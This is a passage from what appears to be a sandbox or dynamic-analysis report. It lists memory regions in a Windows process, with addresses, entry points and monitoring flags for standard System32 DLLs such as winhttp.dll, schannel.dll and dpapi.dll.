filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1297
start_va = 0x7ffc4e510000
end_va = 0x7ffc4e527fff
monitored = 0
entry_point = 0x7ffc4e512000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1298
start_va = 0x7ffc4e530000
end_va = 0x7ffc4e6b1fff
monitored = 0
entry_point = 0x7ffc4e5482a0
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1299
start_va = 0x7ffc4eca0000
end_va = 0x7ffc4ed42fff
monitored = 0
entry_point = 0x7ffc4eca2c10
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1300
start_va = 0x7ffc4ed50000
end_va = 0x7ffc4eda1fff
monitored = 0
entry_point = 0x7ffc4ed55770
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1301
start_va = 0x7ffc4edb0000
end_va = 0x7ffc4edddfff
monitored = 1
entry_point = 0x7ffc4edb2300
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 1302
start_va = 0x7ffc4ede0000
end_va = 0x7ffc4ee3dfff
monitored = 0
entry_point = 0x7ffc4ede5080
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 1303
start_va = 0x7ffc4ee40000
end_va = 0x7ffc4ee5ffff
monitored = 0
entry_point = 0x7ffc4ee41f50
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 1304
start_va = 0x7ffc4ee60000
end_va = 0x7ffc4ee68fff
monitored = 0
entry_point = 0x7ffc4ee618f0
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 1305
start_va = 0x7ffc4ee70000
end_va = 0x7ffc4ee80fff
monitored = 0
entry_point = 0x7ffc4ee71d30
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1306
start_va = 0x7ffc4ee90000
end_va = 0x7ffc4ef0efff
monitored = 0
entry_point = 0x7ffc4eea7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1307
start_va = 0x7ffc4ef10000
end_va = 0x7ffc4ef4bfff
monitored = 0
entry_point = 0x7ffc4ef16aa0
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1308
start_va = 0x7ffc4f0d0000
end_va = 0x7ffc4f11bfff
monitored = 0
entry_point = 0x7ffc4f0e5310
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1309
start_va = 0x7ffc4f220000
end_va = 0x7ffc4f22bfff
monitored = 0
entry_point = 0x7ffc4f2235c0
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1310
start_va = 0x7ffc505f0000
end_va = 0x7ffc505f8fff
monitored = 0
entry_point = 0x7ffc505f21d0
region_type = mapped_file
name = "httpprxc.dll"
filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")
Region:
id = 1311
start_va = 0x7ffc50660000
end_va = 0x7ffc50694fff
monitored = 0
entry_point = 0x7ffc5066a270
region_type = mapped_file
name = "fwpolicyiomgr.dll"
filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")
Region:
id = 1312
start_va = 0x7ffc51300000
end_va = 0x7ffc51309fff
monitored = 0
entry_point = 0x7ffc51301350
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1313
start_va = 0x7ffc516a0000
end_va = 0x7ffc516b1fff
monitored = 0
entry_point = 0x7ffc516a3580
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1314
start_va = 0x7ffc538e0000
end_va = 0x7ffc538e9fff
monitored = 0
entry_point = 0x7ffc538e14c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1315
start_va = 0x7ffc53d70000
end_va = 0x7ffc53d7ffff
monitored = 0
entry_point = 0x7ffc53d71700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 1316
start_va = 0x7ffc53d80000
end_va = 0x7ffc53d88fff
monitored = 0
entry_point = 0x7ffc53d81ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 1317
start_va = 0x7ffc53d90000
end_va = 0x7ffc53dbcfff
monitored = 0
entry_point = 0x7ffc53d92290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 1318
start_va = 0x7ffc53dc0000
end_va = 0x7ffc53e11fff
monitored = 0
entry_point = 0x7ffc53dc38e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 1319
start_va = 0x7ffc54080000
end_va = 0x7ffc540fffff
monitored = 0
entry_point = 0x7ffc540ad280
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1320
start_va = 0x7ffc54160000
end_va = 0x7ffc54174fff
monitored = 0
entry_point = 0x7ffc54162dc0
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 1321
start_va = 0x7ffc541c0000
end_va = 0x7ffc541cdfff
monitored = 0
entry_point = 0x7ffc541c1460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1322
start_va = 0x7ffc541d0000
end_va = 0x7ffc541eafff
monitored = 0
entry_point = 0x7ffc541d1040
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1323
start_va = 0x7ffc54510000
end_va = 0x7ffc545a9fff
monitored = 0
entry_point = 0x7ffc5452ada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1324
start_va = 0x7ffc545e0000
end_va = 0x7ffc545f7fff
monitored = 0
entry_point = 0x7ffc545eb850
region_type = mapped_file
name = "dmcmnutils.dll"
filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")
Region:
id = 1325
start_va = 0x7ffc54680000
end_va = 0x7ffc546e6fff
monitored = 0
entry_point = 0x7ffc546863e0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1326
start_va = 0x7ffc54740000
end_va = 0x7ffc54754fff
monitored = 0
entry_point = 0x7ffc54743460
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1327
start_va = 0x7ffc54830000
end_va = 0x7ffc548effff
monitored = 0
entry_point = 0x7ffc5485fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1328
start_va = 0x7ffc54b20000
end_va = 0x7ffc54b39fff
monitored = 0
entry_point = 0x7ffc54b22430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1329
start_va = 0x7ffc54b40000
end_va = 0x7ffc54b53fff
monitored = 0
entry_point = 0x7ffc54b42d50
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1330
start_va = 0x7ffc54ed0000
end_va = 0x7ffc54f62fff
monitored = 0
entry_point = 0x7ffc54ed9680
region_type = mapped_file
name = "msvcp_win.dll"
filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")
Region:
id = 1331
start_va = 0x7ffc54f70000
end_va = 0x7ffc54f7afff
monitored = 0
entry_point = 0x7ffc54f71de0
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1332
start_va = 0x7ffc55190000
end_va = 0x7ffc551a5fff
monitored = 0
entry_point = 0x7ffc551919f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1333
start_va = 0x7ffc55360000
end_va = 0x7ffc55378fff
monitored = 0
entry_point = 0x7ffc55364520
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1334
start_va = 0x7ffc55820000
end_va = 0x7ffc55857fff
monitored = 0
entry_point = 0x7ffc55838cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1335
start_va = 0x7ffc55860000
end_va = 0x7ffc5586afff
monitored = 0
entry_point = 0x7ffc55861d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1336
start_va = 0x7ffc55c60000
end_va = 0x7ffc55fe1fff
monitored = 0
entry_point = 0x7ffc55cb1220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1337
start_va = 0x7ffc570e0000
end_va = 0x7ffc571edfff
monitored = 0
entry_point = 0x7ffc5712eaa0
region_type = mapped_file
name = "mrmcorer.dll"
filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")
Region:
id = 1338
start_va = 0x7ffc574f0000
end_va = 0x7ffc57506fff
monitored = 0
entry_point = 0x7ffc574f5630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1339
start_va = 0x7ffc57570000
end_va = 0x7ffc57582fff
monitored = 0
entry_point = 0x7ffc575757f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1340
start_va = 0x7ffc57590000
end_va = 0x7ffc57609fff
monitored = 0
entry_point = 0x7ffc575b7630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1341
start_va = 0x7ffc57620000
end_va = 0x7ffc5764dfff
monitored = 0
entry_point = 0x7ffc57627550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1342
start_va = 0x7ffc57650000
end_va = 0x7ffc57665fff
monitored = 0
entry_point = 0x7ffc57651b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1343
start_va = 0x7ffc57670000
end_va = 0x7ffc576d3fff
monitored = 0
entry_point = 0x7ffc57685ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1344
start_va = 0x7ffc578a0000
end_va = 0x7ffc5794dfff
monitored = 0
entry_point = 0x7ffc578b80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1345
start_va = 0x7ffc57950000
end_va = 0x7ffc57961fff
monitored = 0
entry_point = 0x7ffc57959260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1346
start_va = 0x7ffc57970000
end_va = 0x7ffc57a20fff
monitored = 0
entry_point = 0x7ffc579e88b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1347
start_va = 0x7ffc57a30000
end_va = 0x7ffc57a54fff
monitored = 0
entry_point = 0x7ffc57a42f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1348
start_va = 0x7ffc57a60000
end_va = 0x7ffc57a70fff
monitored = 0
entry_point = 0x7ffc57a67ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1349
start_va = 0x7ffc57a80000
end_va = 0x7ffc57a99fff
monitored = 0
entry_point = 0x7ffc57a82cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1350
start_va = 0x7ffc57aa0000
end_va = 0x7ffc57af4fff
monitored = 0
entry_point = 0x7ffc57aa3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1351
start_va = 0x7ffc57b00000
end_va = 0x7ffc57b36fff
monitored = 0
entry_point = 0x7ffc57b06020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1352
start_va = 0x7ffc57b40000
end_va = 0x7ffc57b5ffff
monitored = 0
entry_point = 0x7ffc57b439a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1353
start_va = 0x7ffc57b60000
end_va = 0x7ffc57ba0fff
monitored = 0
entry_point = 0x7ffc57b64840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1354
start_va = 0x7ffc57bb0000
end_va = 0x7ffc57ce5fff
monitored = 0
entry_point = 0x7ffc57bdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1355
start_va = 0x7ffc57cf0000
end_va = 0x7ffc57dd5fff
monitored = 0
entry_point = 0x7ffc57d0cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1356
start_va = 0x7ffc57de0000
end_va = 0x7ffc57debfff
monitored = 0
entry_point = 0x7ffc57de14d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1357
start_va = 0x7ffc57df0000
end_va = 0x7ffc57dfbfff
monitored = 0
entry_point = 0x7ffc57df2830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 1358
start_va = 0x7ffc57e00000
end_va = 0x7ffc57e3dfff
monitored = 0
entry_point = 0x7ffc57e0a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1359
start_va = 0x7ffc57e40000
end_va = 0x7ffc57e66fff
monitored = 0
entry_point = 0x7ffc57e43bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1360
start_va = 0x7ffc57e70000
end_va = 0x7ffc57f37fff
monitored = 0
entry_point = 0x7ffc57eb13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1361
start_va = 0x7ffc57f40000
end_va = 0x7ffc57fa0fff
monitored = 0
entry_point = 0x7ffc57f44b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1362
start_va = 0x7ffc57fb0000
end_va = 0x7ffc5812bfff
monitored = 0
entry_point = 0x7ffc58001650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1363
start_va = 0x7ffc58130000
end_va = 0x7ffc5813afff
monitored = 0
entry_point = 0x7ffc58131770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1364
start_va = 0x7ffc58140000
end_va = 0x7ffc58194fff
monitored = 0
entry_point = 0x7ffc5814fc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1365
start_va = 0x7ffc58230000
end_va = 0x7ffc582c1fff
monitored = 0
entry_point = 0x7ffc5827a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1366
start_va = 0x7ffc58350000
end_va = 0x7ffc5835cfff
monitored = 0
entry_point = 0x7ffc58352ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1367
start_va = 0x7ffc58b50000
end_va = 0x7ffc58b7efff
monitored = 0
entry_point = 0x7ffc58b58910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1368
start_va = 0x7ffc58b80000
end_va = 0x7ffc58b8ffff
monitored = 0
entry_point = 0x7ffc58b82c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1369
start_va = 0x7ffc58c20000
end_va = 0x7ffc58c55fff
monitored = 0
entry_point = 0x7ffc58c30070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1370
start_va = 0x7ffc58cb0000
end_va = 0x7ffc58ccefff
monitored = 0
entry_point = 0x7ffc58cb4960
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1371
start_va = 0x7ffc58cd0000
end_va = 0x7ffc58d3dfff
monitored = 0
entry_point = 0x7ffc58cd7f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1372
start_va = 0x7ffc58d40000
end_va = 0x7ffc58d50fff
monitored = 0
entry_point = 0x7ffc58d43320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1373
start_va = 0x7ffc58d60000
end_va = 0x7ffc58da0fff
monitored = 0
entry_point = 0x7ffc58d77eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1374
start_va = 0x7ffc58db0000
end_va = 0x7ffc58eabfff
monitored = 0
entry_point = 0x7ffc58de6df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1375
start_va = 0x7ffc58eb0000
end_va = 0x7ffc58f6efff
monitored = 0
entry_point = 0x7ffc58ed1c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1376
start_va = 0x7ffc58fc0000
end_va = 0x7ffc58fc9fff
monitored = 0
entry_point = 0x7ffc58fc1660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1377
start_va = 0x7ffc58fd0000
end_va = 0x7ffc58fe7fff
monitored = 0
entry_point = 0x7ffc58fd5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1378
start_va = 0x7ffc58ff0000
end_va = 0x7ffc5913cfff
monitored = 0
entry_point = 0x7ffc59033da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1379
start_va = 0x7ffc59500000
end_va = 0x7ffc59992fff
monitored = 0
entry_point = 0x7ffc5950f760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1380
start_va = 0x7ffc599a0000
end_va = 0x7ffc59a06fff
monitored = 0
entry_point = 0x7ffc599be710
region_type = mapped_file
name = "bcp47langs.dll"
filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")
Region:
id = 1381
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1382
start_va = 0x7ffc5a2e0000
end_va = 0x7ffc5a358fff
monitored = 0
entry_point = 0x7ffc5a2ffb90
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1383
start_va = 0x7ffc5a360000
end_va = 0x7ffc5a367fff
monitored = 0
entry_point = 0x7ffc5a3613e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1384
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1385
start_va = 0x7ffc5a530000
end_va = 0x7ffc5a54bfff
monitored = 0
entry_point = 0x7ffc5a5337a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1386
start_va = 0x7ffc5a6e0000
end_va = 0x7ffc5a71ffff
monitored = 0
entry_point = 0x7ffc5a6f1960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1387
start_va = 0x7ffc5a850000
end_va = 0x7ffc5a876fff
monitored = 0
entry_point = 0x7ffc5a857940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1388
start_va = 0x7ffc5a8a0000
end_va = 0x7ffc5a949fff
monitored = 0
entry_point = 0x7ffc5a8c7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1389
start_va = 0x7ffc5aae0000
end_va = 0x7ffc5aaebfff
monitored = 0
entry_point = 0x7ffc5aae2480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1390
start_va = 0x7ffc5abb0000
end_va = 0x7ffc5abe1fff
monitored = 0
entry_point = 0x7ffc5abc2340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1391
start_va = 0x7ffc5ae20000
end_va = 0x7ffc5ae2bfff
monitored = 0
entry_point = 0x7ffc5ae22790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1392
start_va = 0x7ffc5ae30000
end_va = 0x7ffc5ae53fff
monitored = 0
entry_point = 0x7ffc5ae33260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1393
start_va = 0x7ffc5afd0000
end_va = 0x7ffc5b0c3fff
monitored = 0
entry_point = 0x7ffc5afda960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1394
start_va = 0x7ffc5b120000
end_va = 0x7ffc5b168fff
monitored = 0
entry_point = 0x7ffc5b12a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1395
start_va = 0x7ffc5b240000
end_va = 0x7ffc5b24bfff
monitored = 0
entry_point = 0x7ffc5b2427e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1396
start_va = 0x7ffc5b320000
end_va = 0x7ffc5b350fff
monitored = 0
entry_point = 0x7ffc5b327d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1397
start_va = 0x7ffc5b380000
end_va = 0x7ffc5b3f9fff
monitored = 0
entry_point = 0x7ffc5b3a1a50
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1398
start_va = 0x7ffc5b440000
end_va = 0x7ffc5b473fff
monitored = 0
entry_point = 0x7ffc5b45ae70
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1399
start_va = 0x7ffc5b480000
end_va = 0x7ffc5b489fff
monitored = 0
entry_point = 0x7ffc5b481830
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 1400
start_va = 0x7ffc5b590000
end_va = 0x7ffc5b5aefff
monitored = 0
entry_point = 0x7ffc5b595d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
